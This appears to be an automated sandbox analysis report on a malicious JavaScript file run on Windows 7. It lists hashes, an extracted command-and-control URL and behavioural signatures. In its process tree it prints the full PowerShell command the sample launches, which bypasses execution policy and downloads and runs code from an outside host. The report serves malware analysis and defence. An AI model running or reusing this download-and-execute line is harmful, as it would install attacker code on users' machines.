Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08-02-2024 14:25
Static task
static1
Behavioral task
behavioral1
Sample
DCS7727723772772.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
DCS7727723772772.js
Resource
win10v2004-20231215-en
General
-
Target
DCS7727723772772.js
-
Size
25KB
-
MD5
fa4c5428813c2612116ac59af1862bcb
-
SHA1
50f324f71e12473644eefa338b11dd347d713f68
-
SHA256
8603c3e9cbbf9629724d1d4299418be0d2ad7ce04ea8091fc0bead7430d21fbd
-
SHA512
a770e57adc93505fbf7ccc4152ebc7985839e168770c16697f3b5d5f1ccd85ac5c1b641a7b407d53a727b2fcad33d123b930cc9ad13ba89c113c6809fbaccdb8
-
SSDEEP
768:MleSnV5r8Fi+tVxfS0fy8hghu28Iswykn5d0B/PK3py1XY4TgVzlqIDG3ZBoxPg0:eeaV5oIhzPRZxehtM
Malware Config
Extracted
https://assime.ca/command.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2836 powershell.exe 6 2836 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2836 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 1936 wrote to memory of 2836 1936 wscript.exe powershell.exe PID 1936 wrote to memory of 2836 1936 wscript.exe powershell.exe PID 1936 wrote to memory of 2836 1936 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js1⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836